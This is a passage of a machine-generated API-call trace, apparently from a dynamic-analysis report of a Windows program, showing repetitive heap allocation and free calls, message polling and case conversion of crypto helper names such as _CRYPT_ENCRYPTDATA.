[0030.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0030.560] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.560] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0030.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3119) returned 0x7c7968 [0030.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0030.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0030.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0030.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd60 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3119) returned 0x949138 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0030.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.562] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0030.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0030.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0030.562] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0030.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0030.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.562] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0030.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da248 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0030.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c928 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0030.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0030.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.563] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0030.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0030.563] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0030.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0030.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0030.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0030.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0030.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0030.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0030.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0030.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.564] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0030.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0030.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0030.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0030.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0030.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0030.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0030.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0030.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0030.565] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0030.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.565] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c820 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.565] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0030.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0030.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0030.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0030.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0030.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0030.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0030.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0030.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0030.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0030.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.568] HeapFree (in: 